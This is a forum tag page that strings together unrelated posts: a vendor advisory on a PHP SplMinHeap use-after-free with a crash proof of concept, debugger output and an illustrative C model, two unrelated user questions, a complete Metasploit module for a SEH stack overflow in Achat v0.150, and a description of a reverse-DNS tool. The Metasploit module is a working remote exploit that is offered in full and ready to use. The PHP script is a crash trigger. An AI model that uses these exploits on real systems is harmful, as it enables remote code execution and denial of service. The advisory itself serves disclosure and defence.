Showing results for tags 'ptr'.
-
Use-After-Free in PHP

May 20, 2015

Advisory ID: HTB23262
Product: PHP
Vendor: PHP Group
Vulnerable Versions: 5.6.9 and probably prior
Tested Version: 5.6.9
Advisory Publication: May 20, 2015 [without technical details]
Vendor Notification: May 20, 2015
Vendor Fix: June 2, 2015
Public Disclosure: June 10, 2015
Latest Update: June 9, 2015
Vulnerability Type: Use After Free [CWE-416]
CVE Reference: Pending
Risk Level: Medium
CVSSv2 Base Score: 4.6
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge Security Research Lab discovered a use-after-free vulnerability in the popular programming language PHP, which can be exploited to cause a crash and possibly execute arbitrary code on the target system.

The vulnerability resides within the 'spl_heap_object_free_storage()' PHP function when trying to dereference already freed memory. A local attacker can cause a segmentation fault or possibly execute arbitrary code on the target system with the privileges of the webserver.

Below is a simple code that will trigger a crash:

<?php
class SplMinHeap1 extends SplMinHeap {
    public function compare($a, $b) {
        return -parent::notexist($a, $b);
    }
}
$h = new SplMinHeap1();
$h->insert(1);
$h->insert(6);
$h->insert(5);
$h->insert(2);
?>

Running the following PoC we get:

gdb-peda$ r ~/Desktop/heap_uaf.php
Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php
PHP Fatal error:  Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4

Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ)
RBX: 0x8000000
RCX: 0xcd0458 ("/home/test/De"...)
RDX: 0x16f
RSI: 0xcd0458 ("/home/test/De"...)
RDI: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ)
RBP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0
RSP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0
RIP: 0x82a96f (<zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10])
R8 : 0x269
R9 : 0x0
R10: 0x7fffffff9b20 --> 0x0
R11: 0x7ffff71102f0 --> 0xfffda6c0fffda3ef
R12: 0x4209e0 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdf30 --> 0x2
R14: 0x0
R15: 0x0
[-------------------------------------code-------------------------------------]
   0x82a964 <zval_delref_p+1>:  mov rbp,rsp
   0x82a967 <zval_delref_p+4>:  mov QWORD PTR [rbp-0x8],rdi
   0x82a96b <zval_delref_p+8>:  mov rax,QWORD PTR [rbp-0x8]
=> 0x82a96f <zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10]
   0x82a972 <zval_delref_p+15>: lea edx,[rax-0x1]
   0x82a975 <zval_delref_p+18>: mov rax,QWORD PTR [rbp-0x8]
   0x82a979 <zval_delref_p+22>: mov DWORD PTR [rax+0x10],edx
   0x82a97c <zval_delref_p+25>: mov rax,QWORD PTR [rbp-0x8]
[------------------------------------stack-------------------------------------]
Stopped reason: SIGSEGV
0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411
411         return --pz->refcount__gc;

As seen above, when trying to dereference the value from $rax (which has already been freed) PHP crashes.

Running the backtrace command we can see a couple of freed variables: zval_ptr, pz

gdb-peda$ bt
#0  0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411
#1  0x000000000082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76
#2  0x000000000082bdcb in _zval_ptr_dtor (zval_ptr=0x7ffff7fcba88, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424
#3  0x00000000006e5c1a in spl_heap_object_free_storage (object=0x7ffff7dfdfa0) at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367
#4  0x000000000087f566 in zend_objects_store_free_object_storage (objects=0x102e640 <executor_globals+928>) at /home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97
#5  0x000000000082b89e in shutdown_executor () at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290
#6  0x0000000000841a4c in zend_deactivate () at /home/test/Desktop/php-5.6.9/Zend/zend.c:960
#7  0x00000000007a7c40 in php_request_shutdown (dummy=0x0) at /home/test/Desktop/php-5.6.9/main/main.c:1882
#8  0x00000000008f6501 in do_cli (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1177
#9  0x00000000008f6d8b in main (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1378
#10 0x00007ffff6faaec5 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6
#11 0x0000000000420a09 in _start ()

Lastly, from stack #2 we clearly see that the zval_ptr pointer (0x7ffff7fcba88) points to freed memory:

gdb-peda$ x/50xw 0x7ffff7fcba88
0x7ffff7fcba88: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcba98: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbaa8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbab8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbac8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbad8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbae8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbaf8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbb08: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbb18: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbb28: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbb38: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a
0x7ffff7fcbb48: 0x5a5a5a5a 0x5a5a5a5a

This vulnerability was successfully reproduced on Ubuntu 14.04.1 LTS (32 bit and 64 bit) on the latest version of PHP 5.6.9.

Solution:

Apply Vendor's patch.

More Information:
https://bugs.php.net/bug.php?id=69737
Git - php-src.git/commit

References:
[1] High-Tech Bridge Advisory HTB23262 - https://www.htbridge.com/advisory/HTB23262 - Use-After-Free in PHP.
[2] PHP - PHP: Hypertext Preprocessor - PHP is a popular general-purpose scripting language that is especially suited to web development.
[3] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - a PCI compliant web application penetration test combined with managed vulnerability scan. Configure, schedule, and manage online 24/7.

Source : https://www.htbridge.com/advisory/HTB23262
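The backtrace above shows the shape of the bug class rather than a single bad line: an element's reference is dropped once when the comparator fails during insert, and dropped again when the heap object's storage is freed at shutdown, so the second zval_ptr_dtor() reads poisoned memory. The following C program is an added illustration written for this page; it is not PHP's code and does not reproduce spl_heap.c. It models a refcounted zval, a minimal SplHeap-like array with sift-up insertion, and a comparator that can fail. Instead of handing memory back to malloc it keeps a "freed" flag and fills the value with the same 0x5a pattern seen in the register dump, so the stale dereference is counted deterministically rather than crashing. The hardened path keeps ownership of the element with the heap (which is then flagged corrupted) so free_storage releases it exactly once; the real vendor fix is referenced in the advisory's "More Information" links and may differ.

```c
#include <stdio.h>
#include <string.h>

/* Toy stand-in for a refcounted PHP zval (constructed model, not Zend's
 * zval). Blocks are never returned to malloc: a "freed" flag plus the
 * 0x5a poison value lets the program detect a stale dereference. */
typedef struct { int refcount; int value; int freed; } zval;

#define POOL_SIZE 16
static zval pool[POOL_SIZE];
static int pool_used;
static int uaf_detected;  /* dereferences of already-freed zvals */

static zval *zval_new(int value) {
    zval *z = &pool[pool_used++];
    z->refcount = 1; z->value = value; z->freed = 0;
    return z;
}

/* Counterpart of zval_ptr_dtor(): drop one reference, free at zero. */
static void zval_ptr_dtor(zval *z) {
    if (z->freed) { uaf_detected++; return; }   /* real PHP crashes here */
    if (--z->refcount == 0) { z->freed = 1; z->value = 0x5a5a5a5a; }
}

/* Toy SplHeap storage: array of owned element pointers plus a count. */
typedef struct { zval *elements[POOL_SIZE]; int count; int corrupted; } spl_heap;

/* A comparator may fail (in PHP: compare() throws or hits a fatal error);
 * the failure is reported through *error. */
typedef int (*cmp_fn)(zval *a, zval *b, int *error);
static int cmp_min(zval *a, zval *b, int *error) { *error = 0; return a->value - b->value; }
static int cmp_broken(zval *a, zval *b, int *error) { (void)a; (void)b; *error = 1; return 0; }

/* Insert with sift-up. hardened == 0 models the bug: on comparator failure
 * the element is released but stays referenced from elements[].
 * hardened != 0 leaves ownership with the heap and only flags it corrupted,
 * so heap_free_storage() releases the element exactly once. */
static int heap_insert(spl_heap *h, zval *z, cmp_fn cmp, int hardened) {
    int err = 0, i;
    if (h->corrupted || h->count == POOL_SIZE) return -1;
    i = h->count++;
    while (i > 0) {
        int parent = (i - 1) / 2;
        int c = cmp(h->elements[parent], z, &err);
        if (err || c <= 0) break;            /* min-heap property holds */
        h->elements[i] = h->elements[parent];
        i = parent;
    }
    h->elements[i] = z;                      /* the heap now references z */
    if (err) {
        h->corrupted = 1;
        if (!hardened) zval_ptr_dtor(z);     /* BUG: released, still referenced */
        return -1;
    }
    return 0;
}

/* Counterpart of spl_heap_object_free_storage(): release every element. */
static void heap_free_storage(spl_heap *h) {
    for (int i = 0; i < h->count; i++) { zval_ptr_dtor(h->elements[i]); h->elements[i] = NULL; }
    h->count = 0;
}

/* Replays the PoC shape: insert(1) succeeds (nothing to compare against),
 * insert(6) hits the failing comparator, the script stops, and shutdown
 * frees the object. Returns how many stale dereferences occurred. */
static int run_scenario(int hardened) {
    spl_heap h; memset(&h, 0, sizeof h);
    pool_used = 0; uaf_detected = 0;
    heap_insert(&h, zval_new(1), cmp_broken, hardened);
    heap_insert(&h, zval_new(6), cmp_broken, hardened);
    heap_free_storage(&h);
    return uaf_detected;
}

/* Sanity check with a working comparator: root after inserting 6, 5, 2. */
static int heap_min_after_inserts(void) {
    spl_heap h; memset(&h, 0, sizeof h);
    int root;
    pool_used = 0;
    heap_insert(&h, zval_new(6), cmp_min, 1);
    heap_insert(&h, zval_new(5), cmp_min, 1);
    heap_insert(&h, zval_new(2), cmp_min, 1);
    root = h.elements[0]->value;
    heap_free_storage(&h);
    return root;
}

int main(void) {
    printf("min-heap root after 6,5,2: %d\n", heap_min_after_inserts());
    printf("vulnerable: %d stale dereference(s)\n", run_scenario(0));
    printf("hardened:   %d stale dereference(s)\n", run_scenario(1));
    return 0;
}
```

The design point is ownership: once a container has stored a pointer, the error path must either remove the pointer before releasing it or leave the release to the container's own destructor. A debug-build poison pattern such as the 0x5a fill in the advisory's dump is what turns this class of bug from silent corruption into a reproducible crash, which is why fuzzing interpreters in a debug build is the usual way to find it.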
-
About 2 hours ago I decided to put Fedora on one of my laptops.... All good and well, but to my shame I don't know how to install Pidgin for it.... I have Pidgin on Ubuntu and on Windows, but on Fedora.... no idea how...... I'm waiting for some ideas...
-
Hi, I'd like to open an online account that I can use to pay various bills, orders, etc., but I'd like you to tell me a "company" that has the lowest fees. So far I've heard of PayPal: 2 euro for a withdrawal and 0 for a deposit, if I'm not mistaken. I'd like one with no fees, or lower ones if they exist. Leave a link here and arguments for each. Thank you! P.S. Or at least one that has one free withdrawal per month, or something like that.
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
        This module exploits an unicode SEH based stack buffer overflow in Achat v0.150.
        By sending a crafted message to the default port 9256 it's possible to overwrites
        the SEH handler. Even when the exploit is reliable it depends of timing since there
        are two threads overflowing the stack in the same time. This module has been tested
        on Windows XP SP3 and Windows 7.
      },
      'Author'         =>
        [
          'Peter Kasza <peter.kasza[at]itinsight.hu>',   # Vulnerability discovery
          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>'    # Exploit, Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CWE', '121'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'DisableNops'     => true,
          'Space'           => 730,
          'BadChars'        => "\x00" + (0x80..0xff).to_a.pack("C*"),
          'StackAdjustment' => -3500,
          'EncoderType'     => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK Windows XP SP3, Windows 7
          # Not working on Windows Server 2003
          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2014'))

    register_options(
      [
        Opt::RPORT(9256)
      ], self.class)
  end

  def exploit
    connect_udp

    # 0055 00     ADD BYTE PTR SS:[EBP],DL  # padding
    # 2A00        SUB AL,BYTE PTR DS:[EAX]  # padding
    # 55          PUSH EBP                  # ebp holds a close pointer to the payload
    # 006E 00     ADD BYTE PTR DS:[ESI],CH  # padding
    # 58          POP EAX                   # mov eax, ebp
    # 006E 00     ADD BYTE PTR DS:[ESI],CH  # padding
    # 05 00140011 ADD EAX,11001400          # adjusting eax
    # 006E 00     ADD BYTE PTR DS:[ESI],CH  # padding
    # 2D 00130011 SUB EAX,11001300          # lea eax, eax+100
    # 006E 00     ADD BYTE PTR DS:[ESI],CH  # padding
    # 50          PUSH EAX                  # eax points to the start of the shellcode
    # 006E 00     ADD BYTE PTR DS:[ESI],CH  # padding
    # 58          POP EAX                   # padding
    # 0043 00     ADD BYTE PTR DS:[EBX],AL  # padding
    # 59          POP ECX                   # padding
    # 0039        ADD BYTE PTR DS:[ECX],BH  # padding
    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"

    sploit =  'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
    sploit << "\x62" + 'A' * 45   # 0x62 will be used to calculate the right offset
    sploit << "\x61\x40"          # POPAD + INC EAX
    sploit << target.ret          # AChat.exe p/p/r address

    # adjusting the first thread's unicode payload, tricky asm-fu
    # the first seh exception jumps here, first_stage variable will be executed
    # by the second seh exception as well. It needs to be in sync with the second
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
    # payload, then first_stage variable will take the rest of the job.
    # 0043 00     ADD BYTE PTR DS:[EBX],AL  # padding
    # 55          PUSH EBP                  # ebp with close pointer to payload
    # 006E 00     ADD BYTE PTR DS:[ESI],CH  # padding
    # 58          POP EAX                   # put ebp to eax
    # 006E 00     ADD BYTE PTR DS:[ESI],CH  # padding
    # 2A00        SUB AL,BYTE PTR DS:[EAX]  # setting eax to the right place
    # 2A00        SUB AL,BYTE PTR DS:[EAX]  # adjusting eax a little bit more
    # 05 00140011 ADD EAX,11001400          # more adjusting
    # 0043 00     ADD BYTE PTR DS:[EBX],AL  # padding
    # 2D 00130011 SUB EAX,11001300          # lea eax, eax+100
    # 0043 00     ADD BYTE PTR DS:[EBX],AL  # padding
    # 50          PUSH EAX                  # saving eax
    # 0043 00     ADD BYTE PTR DS:[EBX],AL  # padding
    # 5D          POP EBP                   # mov ebp, eax
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret   # second nseh entry, for the second thread
    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3)   # put address of the payload to EAX
    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length)   # placing the payload
    sploit << "\x00" + 'A' * 10 + "\x00"

    i = 0
    while i < sploit.length do
      if i > 172000
        Rex::sleep(1.0)
      end
      sent = udp_sock.put(sploit[i..i + 8192 - 1])
      i += sent
    end

    disconnect_udp
  end
end

Source
-
Description: Resolver is a Windows-based tool designed to perform a reverse DNS lookup for a given IP address or for a range of IPs in order to find its PTR record. Updated to version 1.0.3: added DNS record brute force. Download: Resolver | SourceForge.net
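A reverse lookup like the one Resolver performs is an ordinary DNS query for a PTR record at a name derived from the address: the IPv4 octets reversed under in-addr.arpa, or all 32 IPv6 nibbles reversed under ip6.arpa. The C function below is an added example written for this page (it is not Resolver's code and does not use its interface); it builds that owner name so the mapping is visible, and is what a client would pass to a resolver before issuing the PTR query. The sample addresses are constructed from documentation ranges. From a defensive standpoint, remember that the PTR answer is published by whoever controls the address block, so a hostname recovered this way is a hint about an IP's owner, not proof of identity; when it matters, confirm it by resolving the returned hostname forward and checking that the original IP is among the answers.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Builds the owner name that a reverse (PTR) lookup queries for an address:
 *   IPv4 -> reversed dotted octets under in-addr.arpa
 *   IPv6 -> all 32 hex nibbles, least significant first, under ip6.arpa
 * Returns 0 on success, -1 if the address does not parse or buf is too small. */
int reverse_pointer_name(const char *addr, char *buf, size_t buflen) {
    unsigned char v4[4], v6[16];

    if (inet_pton(AF_INET, addr, v4) == 1) {
        int n = snprintf(buf, buflen, "%u.%u.%u.%u.in-addr.arpa",
                         v4[3], v4[2], v4[1], v4[0]);
        return (n > 0 && (size_t)n < buflen) ? 0 : -1;
    }

    if (inet_pton(AF_INET6, addr, v6) == 1) {
        size_t pos = 0;
        /* 32 nibbles, each written as "x." (64 chars), then the suffix and NUL */
        if (buflen < 64 + sizeof "ip6.arpa") return -1;
        for (int i = 15; i >= 0; i--) {
            /* walk the bytes backwards; within a byte the low nibble comes first */
            pos += (size_t)snprintf(buf + pos, buflen - pos, "%x.%x.",
                                    v6[i] & 0xf, v6[i] >> 4);
        }
        snprintf(buf + pos, buflen - pos, "ip6.arpa");
        return 0;
    }

    return -1;   /* neither address family parsed the input */
}

int main(void) {
    /* constructed sample inputs from documentation address ranges */
    const char *samples[] = { "192.0.2.1", "2001:db8::1", "not-an-ip" };
    char name[80];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (reverse_pointer_name(samples[i], name, sizeof name) == 0)
            printf("%-12s -> %s\n", samples[i], name);
        else
            printf("%-12s -> (invalid address)\n", samples[i]);
    }
    return 0;
}
```

On a POSIX system the generated name is what the libc resolver queries internally when getnameinfo() is asked for a hostname; building it explicitly is useful when you want to send the PTR query through your own resolver library, log exactly what was asked, or bulk-generate names for a range the way a tool like Resolver does.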